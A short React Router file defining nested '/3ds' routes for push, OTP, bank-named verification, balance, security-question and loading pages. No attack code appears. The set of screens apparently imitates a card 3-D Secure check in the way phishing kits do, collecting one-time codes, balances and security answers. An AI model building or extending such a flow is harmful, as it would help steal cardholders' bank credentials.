import { Route } from "react-router-dom";
import PUSHPage from "./Push";
import Kostil from "./Kostil";
import OTPPage from "./Otp";
import BalanceVerificationPage from "./Balance";
import SecurityQuestionPage from "./Question";
import Loading from "./Loading";
import Adcb from "./Adcb";

const ThreeDSRoutes = () => (
    <Route path="/3ds" element={<Kostil />}>
      <Route path="push" element={<PUSHPage />} />
      <Route path="otp" element={<OTPPage />} />
      <Route path="adcb_verify" element={<Adcb />} />
      <Route path="balance" element={<BalanceVerificationPage />} />
      <Route path="question" element={<SecurityQuestionPage />} />
      <Route path="loading" element={<Loading />} />
      
      {/* <Route path="success" element={<Success />} /> */}
    </Route>

  );

  
  export default ThreeDSRoutes;
